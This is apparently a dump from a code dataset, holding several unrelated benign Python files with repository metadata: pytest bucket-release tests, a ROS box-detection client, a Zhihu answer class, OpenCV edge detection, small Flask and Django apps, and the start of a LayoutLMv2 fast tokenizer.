    assert NUM_BUCKETS / 100 >= 3
def test_can_get_empty_bucket_from_old_format():
    # Old stores persisted buckets as a bare list; loading one through the
    # ODM must still produce a usable Bucket.
    session = Session({'buckets/1': []})
    bucket = session.get(Bucket, 1)
    # Force bucket to a string in order to reify the fields. This validates
    # that the fields are accessible.
    str(bucket)
def test_conflict_on_release():
    # Two releases claiming half the buckets each exhaust the pool; a third
    # release must raise and report the names of the conflicting releases.
    store = {}
    release(
        store=store,
        name='foo',
        constraints=Constraints(),
        branches=[
            ('foo-branch', NUM_BUCKETS // 2, {'setting': 'value'}),
        ],
    )
    release(
        store=store,
        name='bar',
        constraints=Constraints(),
        branches=[
            ('bar-branch', NUM_BUCKETS // 2, {'setting': 'value2'}),
        ],
    )
    with pytest.raises(NotEnoughBucketsException) as e:
        release(
            store=store,
            name='bazz',
            constraints=Constraints(),
            branches=[
                ('bar-branch', NUM_BUCKETS // 2, {'setting': 'value2'}),
            ],
        )
    assert e.value.conflicts == {'foo', 'bar'}
| 1,082 | 0 | 91 |
70fd33e04f19b6b60b4eaaa62dc06de3503c2599 | 3,161 | py | Python | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kuri-kustar/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | 1 | 2019-06-14T08:03:49.000Z | 2019-06-14T08:03:49.000Z | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kucars/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | null | null | null | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kucars/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | 3 | 2016-06-11T11:08:31.000Z | 2016-11-16T12:45:22.000Z | #!/usr/bin/env python
""" autonomous.py - Version 1.0 2016-10-12
General framework based on Patrick Goebel's nav_test.py
Initial version based on ccam-navigation by Chris Mobley
Autonomous movement added by Jonathan Hodges
Define waypoint destinations for a robot to move autonomously within
a map framework.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.5
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import rospkg
import actionlib
from actionlib_msgs.msg import *
from geometry_msgs.msg import Pose, PoseWithCovarianceStamped, Point, Quaternion, Twist
from kuri_mbzirc_challenge_2_msgs.msg import BoxPositionAction, BoxPositionGoal
from tf.transformations import quaternion_from_euler
from decimal import *
import time
from math import radians, pi
if __name__ == '__main__':
try:
mbzirc_c2_auto()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("mbzirc_c2_auto finished.")
| 29.820755 | 87 | 0.725087 | #!/usr/bin/env python
""" autonomous.py - Version 1.0 2016-10-12
General framework based on Patrick Goebel's nav_test.py
Initial version based on ccam-navigation by Chris Mobley
Autonomous movement added by Jonathan Hodges
Define waypoint destinations for a robot to move autonomously within
a map framework.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.5
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import rospkg
import actionlib
from actionlib_msgs.msg import *
from geometry_msgs.msg import Pose, PoseWithCovarianceStamped, Point, Quaternion, Twist
from kuri_mbzirc_challenge_2_msgs.msg import BoxPositionAction, BoxPositionGoal
from tf.transformations import quaternion_from_euler
from decimal import *
import time
from math import radians, pi
class mbzirc_c2_auto():
    """Driver for the MBZIRC challenge-2 box-detection action server.

    On construction it connects to the ``get_box_cluster`` action server,
    sends a single START goal limited to the forward half-plane
    (angle in [-pi/2, pi/2]), waits for the result, then shuts the node down.
    """

    def __init__(self):
        rospy.init_node('test_box_detection', anonymous=True)
        # Enable shutdown in rospy (This is important so we cancel any move_base goals
        # when the node is killed)
        rospy.on_shutdown(self.shutdown)
        # Subscribe to the action server
        self.client = actionlib.SimpleActionClient("get_box_cluster", BoxPositionAction)
        rospy.loginfo("Waiting for action server...")
        # Wait 60 seconds for the action server to become available
        self.client.wait_for_server(rospy.Duration(60))
        rospy.loginfo("Connected to action server")
        # Send start command
        rospy.loginfo("Sending start command")
        goal = BoxPositionGoal()
        goal.request = goal.REQUEST_START
        # NOTE(review): range_max is assigned twice (30, then 60) so the first
        # value is dead; the first line was presumably meant to set range_min —
        # confirm against the action definition before changing.
        goal.range_max = 30
        goal.range_max = 60
        goal.angle_min = -pi/2
        goal.angle_max = pi/2
        self.execute(goal)
        rospy.loginfo("Started")
        #time.sleep(30)
        #rospy.loginfo("Sending stop command")
        #goal = BoxPositionGoal()
        #goal.request = goal.REQUEST_STOP
        #self.execute(goal)
        #rospy.loginfo("Stopped")
        rospy.signal_shutdown("Complete")

    def execute(self, goal):
        """Send *goal* to the action server and wait up to 60 s for a result."""
        # Send the goal pose to the MoveBaseAction server
        self.client.send_goal(goal)
        # Allow 1 minute to get there
        finished_within_time = self.client.wait_for_result(rospy.Duration(60))
        # If we don't get there in time, abort the goal
        if not finished_within_time:
            self.client.cancel_goal()
            rospy.loginfo("Timed out achieving goal")
        else:
            # We made it!
            state = self.client.get_state()
            if state == GoalStatus.SUCCEEDED:
                rospy.loginfo("Goal succeeded!")

    def shutdown(self):
        """rospy shutdown hook: make sure any in-flight goal is cancelled."""
        rospy.loginfo("Stopping the robot...")
        self.client.cancel_goal()
if __name__ == '__main__':
try:
mbzirc_c2_auto()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("mbzirc_c2_auto finished.")
| 1,647 | 2 | 98 |
454d529c8030916a7bfae3ca5b35bd22b8161c1c | 2,670 | py | Python | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@description: //TODO
@version: 1.0
@author: BaoQiang
@license: Apache Licence
@contact: mailbaoqiang@gmail.com
@site: http://www.github.com/githubao
@software: PyCharm
@file: answer.py
@time: 2016/10/5 22:54
"""
from .base import Base
from .normal import normal_attr
from .other import other_obj
from .streaming import streaming
from .generator import generator_of
from utils import common_save
from .urls import *
| 18.93617 | 82 | 0.618352 | #!/usr/bin/env python
# encoding: utf-8
"""
@description: //TODO
@version: 1.0
@author: BaoQiang
@license: Apache Licence
@contact: mailbaoqiang@gmail.com
@site: http://www.github.com/githubao
@software: PyCharm
@file: answer.py
@time: 2016/10/5 22:54
"""
from .base import Base
from .normal import normal_attr
from .other import other_obj
from .streaming import streaming
from .generator import generator_of
from utils import common_save
from .urls import *
class Answer(Base):
    """A Zhihu answer.

    Attributes are declared via decorators (``normal_attr``, ``other_obj``,
    ``streaming``, ``generator_of``) that fetch and cache data from the API;
    the ``return None`` bodies are placeholders replaced by the decorators.
    """

    def __init__(self, aid, cache, session):
        super(Answer, self).__init__(aid, cache, session)

    def _build_url(self):
        # Detail endpoint for this answer id.
        return ANSWER_DETAIL_URL.format(self.id)

    # other_obj -- attributes that resolve to other API objects
    @property
    @other_obj('people')
    def author(self):
        return None

    @property
    @other_obj()
    def question(self):
        return None

    # normal -- plain scalar attributes read from the cached API payload
    @property
    @normal_attr()
    def comment_count(self):
        return None

    @property
    @normal_attr()
    def comment_permission(self):
        '''
        all/ followee/ nobody
        '''
        return None

    @property
    @normal_attr()
    def content(self):
        return None

    @property
    @normal_attr()
    def created_time(self):
        return None

    @property
    @normal_attr()
    def excerpt(self):
        return None

    @property
    @normal_attr()
    def is_copyable(self):
        return None

    @property
    @normal_attr()
    def is_mine(self):
        return None

    @property
    @normal_attr()
    def id(self):
        return self._id

    @property
    @normal_attr()
    def thanks_count(self):
        return None

    @property
    @normal_attr()
    def updated_time(self):
        return None

    @property
    @normal_attr()
    def voteup_count(self):
        return None

    # streaming -- attributes served from the streaming API payload
    @property
    @streaming()
    def can_comment(self):
        return None

    @property
    @streaming(use_cache=False)
    def suggest_edit(self):
        return None

    # generators -- paginated collections backed by list endpoints
    @property
    @generator_of(ANSWER_COLLECTIONS_URL)
    def collections(self):
        return None

    @property
    @generator_of(ANSWER_COMMENTS_URL)
    def comments(self):
        return None

    @property
    @generator_of(ANSWER_VOTERS_URL, 'people')
    def voters(self):
        return None

    # func
    def save(self, path='.', filename=None, invalid_chars=None):
        '''
        Save the answer body to disk via ``common_save``, e.g.:

        for answer in question.answers:
            print(answer.author.name)
            answer.save(question.title)
        '''
        if self._cache is None:
            self._get_data()  # populate the cache before reading content
        common_save(path, filename, self.content, self.author.name, invalid_chars)
| 457 | 1,724 | 23 |
6a1bff4e22e7ea16e28b819b64753e7e438ef141 | 698 | py | Python | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | import cv2
import numpy as np | 24.928571 | 62 | 0.515759 | import cv2
import numpy as np
def identifica_bordas(img_bovino):
    """Highlight edges in *img_bovino*.

    Returns ``(filtered, res)``: ``filtered`` is the high-pass detail image
    re-centred around 127, and ``res`` is its binarization at threshold 105
    (values below 105 become 0, everything else 255).
    """
    # Grayscale conversion followed by a strong Gaussian blur (low-pass).
    gray = cv2.cvtColor(img_bovino, cv2.COLOR_BGR2GRAY)
    smoothed = cv2.GaussianBlur(gray, (41, 41), 0)
    # High-pass: subtract the low frequencies, then shift by +127 so the
    # result stays centred in the uint8 range.
    filtered = (gray - smoothed) + 127 * np.ones(gray.shape, np.uint8)
    # Vectorized binarization, equivalent to masking below/above 105.
    res = np.where(filtered < 105, 0, 255).astype(np.uint8)
    return filtered, res
return filtered, res | 648 | 0 | 23 |
27a094a65838f27768df614eb5bc4305fbc68db8 | 263 | py | Python | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | from flask import Flask, redner_template
app = Flask(__name__)
@app.route('/')
@app.route('/users/<string:username>')
if __name__ == '__main__':
app.run()
| 17.533333 | 40 | 0.661597 | from flask import Flask, redner_template
app = Flask(__name__)
@app.route('/')
def index():
    """Landing page: plain-text greeting."""
    return "hello world"
@app.route('/users/<string:username>')
def users(username):
    """Per-user greeting page; *username* is taken from the URL path.

    BUG FIX: the original returned "<h1>hello %s<h1>" — the second tag
    was an opener instead of the closing </h1>, producing invalid HTML.
    """
    return "<h1>hello %s</h1>" % username
if __name__ == '__main__':
app.run()
| 56 | 0 | 44 |
50abdb5a768ae1f4298b857206805ec3843ad574 | 446 | py | Python | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 12 | 2019-05-04T04:21:27.000Z | 2022-03-02T07:06:57.000Z | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 1 | 2019-07-24T18:43:53.000Z | 2019-07-24T18:43:53.000Z | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 10 | 2019-07-01T04:03:04.000Z | 2022-03-09T03:57:37.000Z | """
48. Majority Number III
"""
# O(n) time
# O(n) extra space
class Solution:
"""
@param nums: A list of integers
@param k: An integer
@return: The majority number
"""
| 18.583333 | 44 | 0.506726 | """
48. Majority Number III
"""
# O(n) time
# O(n) extra space
class Solution:
    """
    @param nums: A list of integers
    @param k: An integer
    @return: The majority number (the first value whose running count
             exceeds len(nums) / k), or None if no such value exists
    """

    def majorityNumber(self, nums, k):
        # A value is a "majority" once it occurs more than n/k times.
        threshold = len(nums) / k
        counts = {}
        for value in nums:
            occurrences = counts.get(value, 0) + 1
            counts[value] = occurrences
            if occurrences > threshold:
                return value
| 225 | 0 | 26 |
5d2fb024a8e83d3340994406c5338ace00a56318 | 1,791 | py | Python | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | null | null | null | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | 9 | 2020-06-05T22:50:59.000Z | 2022-02-10T13:20:10.000Z | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
# def create_profile(sender, **kwargs):
# user = kwargs["instance"]
# if kwargs["created"]:
# user_profile = UserProfile(user=user, bio='my bio')
# user_profile.save()
# post_save.connect(create_profile, sender=User)
@receiver(post_save, sender=User)
| 34.442308 | 103 | 0.713009 | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class UserProfile(models.Model):
    # Extra per-user data attached one-to-one to Django's auth User.
    user = models.OneToOneField(
        User, related_name='profile', on_delete=models.CASCADE)
    # Avatar image; default points at a bundled static placeholder.
    photo = models.ImageField(upload_to='vibes/',
        max_length=255, null=True, blank=True, default='/static/img/default.png')
    phone = models.CharField(max_length=20, blank=True, default='')
    # Flipped to True once the signup email is confirmed.
    email_confirmed = models.BooleanField(default=False)
    bio = models.TextField()
# def create_profile(sender, **kwargs):
# user = kwargs["instance"]
# if kwargs["created"]:
# user_profile = UserProfile(user=user, bio='my bio')
# user_profile.save()
# post_save.connect(create_profile, sender=User)
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
    """post_save hook on User: create the profile on first save, then persist it.

    ``created`` is True only on the initial INSERT; every save also
    re-saves the related profile so its changes are not lost.
    """
    if created:
        UserProfile.objects.create(user=instance)
    instance.profile.save()
class Project(models.Model):
    # A showcased project submitted by a user, rated on three axes.
    title = models.CharField(max_length=30)
    image = models.ImageField(upload_to='projects/')
    description = models.CharField(max_length=255)
    link = models.URLField(default='')
    project_owner = models.ForeignKey(User, on_delete=models.DO_NOTHING)
    # Ratings stored with one decimal place, defaulting to 0.
    design_rating = models.DecimalField(
        max_digits=3, decimal_places=1, default=0, blank=True)
    usability_rating = models.DecimalField(
        max_digits=3, decimal_places=1, default=0, blank=True)
    content_rating = models.DecimalField(
        max_digits=3, decimal_places=1, default=0, blank=True)

    @classmethod
    def fetch_project(cls, project_id):
        # NOTE(review): this filters on project_owner__id, so the argument
        # is effectively a *user* id rather than a project id — confirm
        # against callers before renaming.
        return cls.objects.filter(project_owner__id=project_id)
| 212 | 1,043 | 68 |
0f711f166abfbfb1b3d26f87bcdde914d199d2d3 | 233 | py | Python | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | 5 | 2020-02-18T00:29:20.000Z | 2020-12-16T12:35:07.000Z | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | 38 | 2020-02-15T11:11:47.000Z | 2020-12-16T12:06:02.000Z | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | null | null | null | import os
| 17.923077 | 60 | 0.609442 | import os
def run_sh(command):
    """Run *command* through the shell; abort the process on failure.

    Mirrors ``set -e`` shell behaviour: a non-zero status prints an
    error and terminates the interpreter with exit code 1.
    """
    status = os.system(command)
    if status != 0:
        print(f"Error while running `{command}`, aborting!")
        # FIX: raise SystemExit instead of calling the site-module helper
        # `exit()`, which is intended for interactive use and is not
        # guaranteed to exist (e.g. under `python -S`).
        raise SystemExit(1)
def clean_file(filepath):
    """Ensure *filepath* ends up absent, creating it first if missing.

    FIX: the original shelled out via ``touch {filepath} && rm {filepath}``
    with the path interpolated unquoted, which broke on (and was injectable
    through) paths containing spaces or shell metacharacters. Plain file
    operations are safe and avoid spawning a shell entirely.
    """
    # open in append mode creates the file if needed, so the remove
    # below never fails on a missing path
    with open(filepath, "a"):
        pass
    os.remove(filepath)
| 175 | 0 | 46 |
0a2c84469f7dd1d2124a639fff298d8ba6a8bbd8 | 38,164 | py | Python | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 3 | 2021-11-22T14:00:00.000Z | 2022-02-14T16:12:13.000Z | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 1 | 2021-12-01T21:38:47.000Z | 2021-12-01T21:38:47.000Z | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 2 | 2021-02-18T03:12:51.000Z | 2021-04-16T13:16:58.000Z | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv2. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import normalizers
from ...file_utils import PaddingStrategy, TensorType, add_end_docstrings
from ...tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
from .tokenization_layoutlmv2 import LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING, LayoutLMv2Tokenizer
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/vocab.txt",
},
"tokenizer_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/tokenizer.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv2-base-uncased": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"microsoft/layoutlmv2-base-uncased": {"do_lower_case": True},
}
class LayoutLMv2TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv2 tokenizer (backed by HuggingFace's `tokenizers` library). Based on WordPiece.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
methods. Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
File containing the vocabulary.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
cls_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[1000, 1000, 1000, 1000]`):
The bounding box to use for the special [SEP] token.
pad_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (:obj:`int`, `optional`, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the :obj:`ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to only label the first subword, in case word labels are provided.
tokenize_chinese_chars (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see `this
issue <https://github.com/huggingface/transformers/issues/328>`__).
strip_accents: (:obj:`bool`, `optional`):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for :obj:`lowercase` (as in the original LayoutLMv2).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = LayoutLMv2Tokenizer
    @add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    def __call__(
        self,
        text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
        text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
        boxes: Union[List[List[int]], List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = False,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs
    ) -> BatchEncoding:
        """
        Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
        sequences with word-level normalized bounding boxes and optional labels.

        Args:
            text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
                (words of a single example or questions of a batch of examples) or a list of list of strings (batch of
                words).
            text_pair (:obj:`List[str]`, :obj:`List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
                (pretokenized string).
            boxes (:obj:`List[List[int]]`, :obj:`List[List[List[int]]]`):
                Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
            word_labels (:obj:`List[int]`, :obj:`List[List[int]]`, `optional`):
                Word-level integer labels (for token classification tasks such as FUNSD, CORD).
        """
        # Input type checking for clearer error
        if text_pair is not None:
            # in case text + text_pair are provided, text = questions, text_pair = words
            if not _is_valid_text_input(text):
                raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
            if not isinstance(text_pair, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        else:
            # in case only text is provided => must be words
            if not isinstance(text, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )

        # Determine whether the call is a single example or a batch. With a
        # text_pair, `text` being a list already means a batch of questions;
        # without one, a batch is a list of lists of words.
        if text_pair is not None:
            is_batched = isinstance(text, (list, tuple))
        else:
            is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))

        # Every word must come with exactly one bounding box.
        words = text if text_pair is None else text_pair
        assert boxes is not None, "You must provide corresponding bounding boxes"
        if is_batched:
            assert len(words) == len(boxes), "You must provide words and boxes for an equal amount of examples"
            for words_example, boxes_example in zip(words, boxes):
                assert len(words_example) == len(
                    boxes_example
                ), "You must provide as many words as there are bounding boxes"
        else:
            assert len(words) == len(boxes), "You must provide as many words as there are bounding boxes"

        # Dispatch to the batch or single-example encoder.
        if is_batched:
            if text_pair is not None and len(text) != len(text_pair):
                raise ValueError(
                    f"batch length of `text`: {len(text)} does not match batch length of `text_pair`: {len(text_pair)}."
                )
            batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
            is_pair = bool(text_pair is not None)
            return self.batch_encode_plus(
                batch_text_or_text_pairs=batch_text_or_text_pairs,
                is_pair=is_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
        else:
            return self.encode_plus(
                text=text,
                text_pair=text_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
    @add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    def batch_encode_plus(
        self,
        batch_text_or_text_pairs: Union[
            List[TextInput],
            List[TextInputPair],
            List[PreTokenizedInput],
        ],
        is_pair: bool = None,
        boxes: Optional[List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = False,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs
    ) -> BatchEncoding:
        """
        Tokenize and prepare a batch of examples (with word-level boxes and
        optional labels): resolves the padding/truncation strategy from the
        user-facing arguments, then delegates to :meth:`_batch_encode_plus`.
        """
        # Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
        padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
            padding=padding,
            truncation=truncation,
            max_length=max_length,
            pad_to_multiple_of=pad_to_multiple_of,
            verbose=verbose,
            **kwargs,
        )

        return self._batch_encode_plus(
            batch_text_or_text_pairs=batch_text_or_text_pairs,
            is_pair=is_pair,
            boxes=boxes,
            word_labels=word_labels,
            add_special_tokens=add_special_tokens,
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_tensors=return_tensors,
            return_token_type_ids=return_token_type_ids,
            return_attention_mask=return_attention_mask,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_offsets_mapping=return_offsets_mapping,
            return_length=return_length,
            verbose=verbose,
            **kwargs,
        )
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
